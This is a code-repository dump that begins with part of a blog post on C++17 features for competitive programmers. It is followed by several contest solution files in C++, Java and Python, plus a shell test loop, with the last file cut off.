Feel free to comment and provide more real-world examples or ask to elaborate some features with more examples or explanations.\n\n### Fold expressions\n\n* I think that everybody knows, what reduce or fold means, but a c++11 example:\n\n```\nvector<int> v = {1, 3, 5, 7};\nint res = accumulate(v.begin(), v.end(), 0, [](int a, int b) { return a + b; });\ncout << res; // 16\n```\n\n* In C++17 there is also folding support for a template parameters list. It has the following syntax:\n\n```\n(pack op ...)\n(... op pack)\n(pack op ... op init)\n(init op ... op pack)\n```\n\n* For example, implement a template function that takes a variable number of parameters and calculates their sum. \n\n[cut]\n\nBefore C++17 we cannot do this without explicit first argument:\n\n```\n//C++14\nauto Sum()\n{\n return 0;\n}\n\ntemplate<typename Arg, typename... Args>\nauto Sum(Arg first, Args... rest)\n{\n return first + Sum(rest...);\n}\n\ncout << Sum(1, 2, 3, 4, 5); // 15\n```\n\n```\n//C++17\ntemplate<typename... Args>\nauto Func(Args... args)\n{\n return (args + ...);\n}\n\ncout << Func(1, 2, 3, 4, 5); // 15\n```\n\n* This is useful, when we use comma as `op`:\n\n```\n// C++17\ntemplate<typename T, typename... Args>\nvoid pushToVector(vector<T>& v, Args&&... args)\n{\n (v.push_back(forward<Args>(args)), ...);\n //This code is expanded into a sequence of expressions separated by commas as follows:\n // v.push_back(forward<Args_1>(arg1)),\n // v.push_back(forward<Args_2>(arg2)),\n // ....\n}\n\nvector<int> v;\npushToVector(v, 1, 4, 5, 8);\n```\n\n* And my favourite example:\n\n```\n//C++17\ntemplate<typename... Args>\nvoid readln(Args&... args)\n{\n ((cin >> args), ...);\n}\n\ntemplate<typename... Args>\nvoid writeln(Args... 
args)\n{\n ((cout << args << \" \"), ...);\n}\n\nint x;\ndouble y;\nreadln(x, y); // enter 100 500.1234\nwriteln(x, \"some string\", y); // 100 some string 500.1234\n```\n\n* **Note**: brackets are meaningfull\n\n### Class template argument deduction\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\n//C++11\npair<int, double> p1 = {14, 17.0}\npoint<int> u = {1, 2};\n\n//C++17\npair p2 = {14, 17.0}\npoint v = {1, 2};\n```\n\nIf struct is complex, there is a possibility to write deduction guides ourselves, for instance:\n\n```\ntemplate<typename T, typename U>\nstruct S\n{\n T first;\n U second;\n};\n\n// My deduction guide\ntemplate<typename T, typename U>\nS(const T &first, const U &second) -> S<T, U>;\n\n```\n**Note**: the compiler is able to create deduction guide automatically from a constructor, but in this example, the structure S has no constructor, so, we define deduction guide manually.\n\n### `*this` capture in lambda expressions\n\nI don't think this is useful in CP, but who knows:\n\n```\nstruct someClass\n{\n int x = 0;\n\n void f() const\n {\n cout << x << '\\n';\n }\n\n void g()\n {\n x++;\n }\n\n // C++14\n void func()\n {\n auto lambda1 = [self = *this]() { self.f(); };\n auto lambda2 = [self = *this]() mutable { self.g(); };\n lambda1();\n lambda2();\n }\n\n // C++17\n void funcNew()\n {\n auto lambda1 = [*this]() { f(); };\n auto lambda2 = [*this]() mutable { g(); };\n lambda1();\n lambda2();\n }\n};\n\n```\n[Article](https://arne-mertz.de/2017/10/mutable/) about `mutable` keyword.\n\n### Structured bindings\n\n* The most useful syntax sugar for decomposition of objects.\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\nvector<point<int>> points = {{0, 0}, {1, 0}, {1, 1}, {1, 0}};\n//C++11\nfor (auto& point : points)\n{\n int x, y;\n tie(x, y) = point;\n //...Some compex logic with x and y\n}\n\n//C++17\nfor (auto& [x, y] : points)\n{\n //...Some 
compex logic with x and y\n}\n```\n\n* Iterating over map:\n\n```\nmap<int, string> m;\nfor (auto [key, value] : m)\n cout << \"key: \" << key << '\\n' << \"value: \" << value << '\\n';\n```\n\n* A good example of usage is problem [problem:938D]. Code with structured bindings (Dijkstra algo) is much more readable and understandable: compare [submission:35474147] and [submission:35346635].\n\n```\nwhile (!q.empty())\n{\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n}\n```\n\n### Initializer in `if` and `switch`\n\n```\nset<int> s;\n\nif (auto [iter, ok] = s.insert(42); ok)\n{\n //...\n}\nelse\n{\n //`ok` and `iter` are available here\n}\n//But not here\n```\n\n### New attributes\n\n* `[[fallthrough]]` attribute indicates that the break operator inside a case block is missing intentionally:\n\n```\nint requests, type;\ncin >> requests;\nfor (int q = 0; q < requests; ++q)\n switch (cin >> type; type) //Initializer in switch\n {\n case 1:\n int l, r;\n cin >> l >> r;\n //proceed request of first type\n break;\n case 2:\n [[fallthrough]];\n //Compiler warning will be supressed\n case 3:\n int value;\n cin >> value;\n //Proceed requests of second and third types.\n }\n```\n\n* `[[nodiscard]]` attribute is used to indicate that the return value of the function should not be ignored and can be also applied to data types.\n\n### std::optional\n\n```\noptional<int> findPath(graph g, int from, int to)\n{\n //Find path from `from` to `to`\n if (d[to] != INF)\n return d[to];\n return {}\n}\n\n//We can check if value exists\nif (auto dist = findPath(...); dist.hasValue())\n cout << dist.value(); //And get it\nelse\n cout << -1;\n\n//Or use defaultValue if value is not set\ncout << findPath(...).value_or(-1); //Prints distance if path exists and -1 otherwise\n```\n\n### Non-constant string::data\n\nFor 
C-lovers:\n\n```\nstring str = \"hello\";\nchar *p = str.data();\np[0] = 'H';\ncout << str; // Hello\n```\n\n### Free functions std::size, std::data and std::empty\n\nIn addition to the already existing free functions std::begin, std::end and others, some new free functions appeared, such as: std::size, std::data and std::empty:\n\n```\nvector<int> v = { 3, 2, 5, 1, 7, 6 };\n\nsize_t sz = size(v);\nbool empty = empty(v);\nauto ptr = data(v);\n```\n\n### std::clamp\n\nReturns `x` if it is in the interval `[low, high]` or, otherwise, the nearest value:\n\n```\ncout << clamp(7, 0, 10); //7\ncout << clamp(7, 0, 5); //5\ncout << clamp(7, 10, 50); //10\n```\n\nI think that it is convenient function, but it'll be difficult to call it in mind during contest :)\n\n### GCD and LCM!\n\n```\ncout << gcd(24, 60); // 12\ncout << lcm(8, 10); // 40\n```\n\n### The return value from `emplace_back`\n\n```\nvector<int> v = { 1, 2, 3 };\n\nauto &r = v.emplace_back(10);\nr = 42;\n//v now contains {1, 2, 3, 42}\n```\n\n### std::map functions:\n\n* Extract (and even change key!!!)\n\n```\nmap<int, string> myMap{ { 1, \"Gennady\" }, { 2, \"Petr\" }, { 3, \"Makoto\" } };\nauto node = myMap.extract(2);\nnode.key() = 42;\nmyMap.insert(move(node));\n\n// myMap: {{1, \"Gennady\"}, {42, \"Petr\"}, {3, \"Makoto\"}};\n```\n\n**Note**: Extract is the only way to change a key of a map element without reallocation\n\nComplexity: \nextract(key): $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/extract) \nextract(iterator): $O(1)$ amortized [doc](http://en.cppreference.com/w/cpp/container/map/extract)\n\n* Merge\n\n```\nmap<int, string> m1{ { 1, \"aa\" }, { 2, \"bb\" }, { 3, \"cc\" } }; \nmap<int, string> m2{ { 4, \"dd\" }, { 5, \"ee\" }, { 6, \"ff\" } };\nm1.merge(m2);\n// m1: { {1, \"aa\"}, {2, \"bb\"}, {3, \"cc\"}, {4, \"dd\"}, {5, \"ee\"}, {6, \"ff\"} }\n// m2: {}\n```\n\nCompexity: $O(N \\log(N + M))$ [doc](http://en.cppreference.com/w/cpp/container/map/merge)\n\n* To figure out 
if the insert or update occurred, we had to first look for the element, and then apply the operator[]. Now we had insert_or_assign:\n\n```\nmap<int, string> m;\nm.emplace(1, \"aaa\");\nm.emplace(2, \"bbb\");\nm.emplace(3, \"ccc\");\n\nauto [it1, inserted1] = m.insert_or_assign(3, \"ddd\");\ncout << inserted1; // 0\n\nauto [it2, inserted2] = m.insert_or_assign(4, \"eee\");\ncout << inserted2; // 1\n```\n\nComplexity: $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/emplace)\n\n### More rigorous evaluation order of expressions\n\nAnd in general c++17 introduces new rules, defining more strictly the evaluation order of expressions:\n\n* Postfix expressions are evaluated from left to right (including function calls and access to objects members)\n* Assignment expressions are evaluated from right to left.\n* Operands of operators << and >> are evaluated from left to right.\n\nThus, as it is mentioned in the proposal for the standard, in the following expressions a is now guaranteed to be evaluated first, then b, then c:\n\n```\na.b\na->b\na->*b\na(b1, b2, b3)\nb @= a\na[b]\na << b << c\na >> b >> c\n```\n\n**Note**: the evaluation order between b1, b2, b3 is still not defined.\n\nP.S.: All materials are adopted with my examples from [here](https://www.viva64.com/en/b/0533) \nP.P.S.: I don't think my english is [poor](http://codeforces.com/blog/entry/57479?#comment-411601), but please PM me about grammar or other mistakes to make this article better!\n" }, { "alpha_fraction": 0.40689656138420105, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 17.125, "blob_id": "e0ff8014bd6f6c92f701b6d2b431cedb7ed3c226", "content_id": "9aa4a186160e2683e0174661c0e12edd815b698a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/CodeForce/0738/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 
10 ** 1 - 1\nk = n\ns = n + 1\nt = n\nprint(n, k, s, t)\nfor i in range(n):\n print(i + 1, 1)\nprint(\" \".join(str(i + 1) for i in range(k)))\n" }, { "alpha_fraction": 0.4297795295715332, "alphanum_fraction": 0.44004833698272705, "avg_line_length": 24.274808883666992, "blob_id": "9baa4d2675dce0aa06ca5c71ecc277fed11582e6", "content_id": "a9daf2802a93d0a8ad38695e4a416b6ddb3d2e68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3311, "license_type": "no_license", "max_line_length": 928, "num_lines": 131, "path": "/CodeForce/0292/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &a, int n)\n{\n int x;\n a.push_back(0);\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a.push_back(x);\n }\n}\n\nvoid 
writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nstruct node\n{\n vector<node*> v;\n int count;\n int l;\n int f;\n node(int l, int count, int f)\n {\n this->count = count;\n this->l = l;\n this->f = f;\n }\n};\n\nnode *root;\nnode *k;\n\nint get(int s, int temp)\n{\n while (true)\n {\n int i = 0;\n while (s > temp)\n {\n temp += k->v[i]->count;\n i++;\n }\n if (k->f)\n break;\n i--;\n temp -= k->count;\n k = k->v[i];\n }\n return k->f == 1 ? a[s - temp + k->l] : b[s - temp + k->l];\n}\n\nvoid inser(int s, int where, int much)\n{\n int temp = 0;\n while (true)\n {\n int i = 0;\n k->count += much;\n while (s > temp)\n {\n temp += k->v[i]->count;\n i++;\n }\n if (k->f)\n break;\n i--;\n temp -= k->count;\n k = k->v[i];\n }\n node *t = new node(k->l, temp - s + 1, k->f);\n k->v.push_back(t);\n t = new node(where, much, 2);\n k->v.push_back(t);\n t = new node(temp - s + k->l + 2, k->count - temp + s - 1 - much, k->f);\n k->v.push_back(t);\n k->f = 0;\n }\n\nvoid writeln(node* k)\n{\n writeln(k->l, k->count, k->f);\n for (int i = 0; i < k->v.size(); i++)\n writeln(k->v[i]);\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, m, x, y, z, s;\n readln(n, m);\n readln(b, n);\n readln(a, n);\n node *t = new node(0, n, 1);\n root = new node(0, 0, 0);\n root->v.push_back(t);\n for (int qq = 0; qq < m; qq++)\n {\n writeln(root);\n read(s);\n k = root;\n if (s == 2)\n {\n cout << \"ck\\n\";\n readln(x);\n writeln(get(x, 0));\n } else\n {\n cout << \"ins\\n\";\n readln(x, y, z);\n inser(x, y - 1, z);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5281925797462463, "alphanum_fraction": 0.543570339679718, "avg_line_length": 31.280574798583984, "blob_id": "5928c76a3591f19c6f3831adbf31bdfa61aacc7d", "content_id": "a5405eb644a65c5c81e88d6d554befc4baadc506", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 4487, "license_type": "no_license", "max_line_length": 174, "num_lines": 139, "path": "/CodeForce/0200/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nstruct team\n{\n int scored = 0;\n int losed = 0;\n int points = 0;\n string name;\n team() {}\n team(string name) : name(name) {}\n\n bool operator<(const team& other) const {\n return tuple(-points, losed - scored, -scored, name) < tuple(-other.points, other.losed - other.scored, -other.scored, other.name);\n }\n\n friend ostream& operator<<(ostream& os, const team& t) {\n return os << t.name << \" \" << t.points << \" \" << t.scored << \" \" << t.losed;\n };\n};\n\nvoid run()\n{\n vector<team> teams;\n map<string, int> indices;\n set<string> names, other;\n string berland = \"BERLAND\";\n\n auto addTeam = [&](const string& name) {\n names.insert(name);\n if (indices.find(name) == indices.end())\n indices[name] = teams.size(),\n teams.emplace_back(name);\n };\n\n auto addMatch = [&](team& first, team& second, int a, int b) {\n first.scored += a;\n first.losed += b;\n second.scored += b;\n second.losed += a;\n if (a == b)\n first.points++,\n second.points++;\n else if (a < b)\n second.points += 3;\n else\n first.points += 3;\n };\n fori(5)\n {\n string f, s;\n char c;\n int a, b;\n readln(f, s, a, c, b);\n addTeam(f);\n addTeam(s);\n team& first = teams[indices[f]];\n team& second = teams[indices[s]];\n addMatch(first, second, a, b);\n if (f == berland)\n other.insert(s);\n if (s == berland)\n other.insert(f);\n }\n names.erase(berland);\n for (auto& x: other) names.erase(x);\n int i = indices[berland];\n int j = indices[*names.begin()];\n pii score;\n int mx = INTMAX;\n for (int x = 1; x < 100; x++)\n for (int y = 0; y < x; y++)\n {\n auto current = teams;\n addMatch(current[i], current[j], x, y);\n sort(all(current));\n if (current[0].name == berland || current[1].name == berland)\n if (x - y < mx)\n mx = x - y,\n score = {x, y};\n }\n if (mx == INTMAX)\n writeln(\"IMPOSSIBLE\");\n else\n cout << score.first << 
\":\" << score.second << \"\\n\";\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5632184147834778, "avg_line_length": 16.399999618530273, "blob_id": "379a2f0691ecbaa931879350c816a08522132fbd", "content_id": "e275c446489d42901fde3d502d6552a267f1b5a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 87, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/CodeForce/1275/run.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "for i in {1..100}\ndo\n ./F < input > output &\n ./interactor > input < output\ndone\n" }, { "alpha_fraction": 0.32588356733322144, "alphanum_fraction": 0.33316007256507874, "avg_line_length": 22.673076629638672, "blob_id": "0aeb8439fe4151bf3b1f148a34e7ca0fe31fb5e0", "content_id": "80d5ef32ae6f20942d79080dcb97ab92131b8827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5242, "license_type": "no_license", 
"max_line_length": 82, "num_lines": 156, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\nimport static java.lang.Math.*;\r\n \r\npublic class K {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    public void solve() {\r\n        int n = in.nextInt();\r\n \r\n        int[] a = new int[n];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            a[i] = in.nextInt();\r\n        }\r\n \r\n        int k = 30;\r\n        long[] c = new long[k];\r\n \r\n        for (int i = 0; i < k; i++) {\r\n            c[i] = in.nextLong();\r\n        }\r\n        int m = 1 << n;\r\n \r\n        long[][] w = new long[n][n];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            for (int j = 0; j < n; j++) {\r\n                int d = a[i] ^ a[j];\r\n \r\n                for (int b = 0; b < k; b++) {\r\n                    if (((1 << b) & d) > 0) {\r\n                        w[i][j] += c[b];\r\n                    }\r\n                }\r\n            }\r\n        }\r\n \r\n        long[][] dp = new long[n][m];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            for (int mask = 1; mask < m; mask++) {\r\n                dp[i][mask] = Integer.MAX_VALUE;\r\n            }\r\n        }\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            int mask = 1 << i;\r\n \r\n            long cur = 0;\r\n            for (int b = 0; b < k; b++) {\r\n                if (((1 << b) & a[i]) > 0) {\r\n                    cur += c[b];\r\n                }\r\n            }\r\n \r\n            dp[i][mask] = cur;\r\n \r\n        }\r\n \r\n        for (int mask = 1; mask < m; mask++) {\r\n            for (int i = 0; i < n; i++) {\r\n                if (((1 << i) & mask) > 0) {\r\n \r\n                    int free = mask ^ (1 << i);\r\n \r\n                    for (int j = 0; j < 
n; j++) {\r\n                        if (((1 << j) & free) > 0) {\r\n                            dp[i][mask] = min(dp[i][mask], dp[j][free] + w[i][j]);\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n \r\n        long ans = Integer.MAX_VALUE;\r\n        for (int i = 0; i < n; i++) {\r\n            ans = min(ans, dp[i][m - 1]);\r\n        }\r\n \r\n        out.println(ans);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) 
{\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new K().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.4491384029388428, "alphanum_fraction": 0.4660922586917877, "avg_line_length": 35.71428680419922, "blob_id": "80525dfd1f4c307ed1054a30e8da8b0c7991b7bb", "content_id": "95ec45dbd549b3d0b2d020b6cd80a73f583f2d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3598, "license_type": "no_license", "max_line_length": 928, "num_lines": 98, "path": "/CodeForce/0389/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, 
b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint g[1001][1001];\nvoid addedge(int i, int j, int v = 1)\n{\n g[i][j] = v;\n g[j][i] = v;\n}\n\nvoid run()\n{\n int k;\n readln(k);\n if (k == 1)\n {\n printf(\"2\\nNY\\nYN\\n\");\n return;\n }\n if (k == 3)\n {\n printf(\"5\\nNNYYY\\nNNYYY\\nYYNNN\\nYYNNN\\nYYNNN\\n\");\n return;\n }\n vi ans;\n int mx = 0;\n fori(30)\n if (1 << i & k)\n ans.pb(i),\n mx = i;\n int count = 2, last = 0, thelast;\n for (int j = ans.size() - 1; j >= 0; j--)\n {\n addedge(0, count);\n addedge(0, count + 1);\n for (int i = 0, f = 0; i < mx && !f; i++)\n for (int t = 0; t < 2; t++, count++)\n if (i < ans[j] - 1)\n addedge(count, count + 2 - t),\n addedge(count, count + 3 - t),\n last = max(last, count + 2 - t);\n else\n if (j == ans.size() - 1)\n addedge(count, 1);\n else\n if (i < ans[j + 1] - 2)\n {\n if (i == 0)\n last = max(last, count + 2);\n addedge(count, count + 2);\n }\n else\n addedge(count, thelast, j || !t || !(k % 2)),\n f = 1;\n thelast = last;\n }\n writeln(count);\n fori(count)\n {\n forj(count)\n printf(\"%c\", g[i][j] ? 
'Y' : 'N');\n enter;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.45916515588760376, "alphanum_fraction": 0.47549909353256226, "avg_line_length": 22.913043975830078, "blob_id": "915a586bed894ba3cb46f8a40f0f3d5ed5ddc1a2", "content_id": "472b0cfa671f8301add530087d51df0aa5170ae4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/2023/tin/5.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\n\n\ndef get_answer_mask(text: str) -> list[int]:\n got, ans = text.split(', ')\n ret = [0] * 5\n s = set()\n for i in range(5):\n if got[i] == ans[i]:\n ret[i] = 1\n s.add(got[i])\n elif got[i] in ans and not got[i] in s:\n ret[i] = 0\n s.add(got[i])\n else:\n ret[i] = -1\n return ret\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(map(str, get_answer_mask(input_str))))\n" }, { "alpha_fraction": 0.3925538957118988, "alphanum_fraction": 0.4239059388637543, "avg_line_length": 21.202898025512695, "blob_id": "62a698848491175a57ec169ff9313a9baa5b5ee4", "content_id": "0bf5939887e2a9fb02b22c8badfdfd54042e8988", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1823, "license_type": "no_license", "max_line_length": 72, "num_lines": 69, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <vector>\n#include <iostream>\n#include <fstream>\n#include <cstdio>\n#include <stdio.h>\n#define ULL unsigned long long\nusing namespace std;\n \nULL F[18];\n \nULL num_by_perm(vector<int> v) {\n    if (v.size() == 2) {\n        return 0;\n    }\n    int n = 
v.size() / 2;\n    ULL ans = (v[1] - 2) * F[n - 1];\n    vector<int> cut;\n    for (int i = 2; i < v.size(); i++) {\n        if (v[i] > v[1])\n            cut.push_back(v[i] - 2);\n        else\n            cut.push_back(v[i] - 1);\n    }\n    return ans + num_by_perm(cut);\n}\n \nvector<int> perm_by_num(ULL num, int n) {\n    vector<int> ans(2 * n);\n    if (n == 1) {\n        ans[0] = 1;\n        ans[1] = 2;\n        return ans;\n    }\n    ans[0] = 1;\n    ans[1] = num / F[n - 1] + 2;\n    vector<int> cut = perm_by_num(num - (ans[1] - 2) * F[n - 1], n - 1);\n    for (int i = 0; i < cut.size(); i++) {\n        if (cut[i] + 1 < ans[1])\n            ans[i + 2] = cut[i] + 1;\n        else\n            ans[i + 2] = cut[i] + 2;\n    }\n    return ans;\n}\n \nvoid main(){\n    ifstream in(\"pairings.in\");\n    ofstream out(\"pairings.out\");\n    F[0] = 1;\n    for (int i = 1; i < 18; i++) {\n        F[i] = F[i - 1] * (2 * i - 1);\n    }\n    int n;\n    in >> n;\n    vector<int> v(2 * n);\n    for (int i = 0; i < n * 2; i++) {\n        in >> v[i];\n    }\n    ULL number = num_by_perm(v);\n    number = 2 * number + 1;\n    if (number >= F[n]) {\n        out << \"Already finished!\";\n        return;\n    }\n    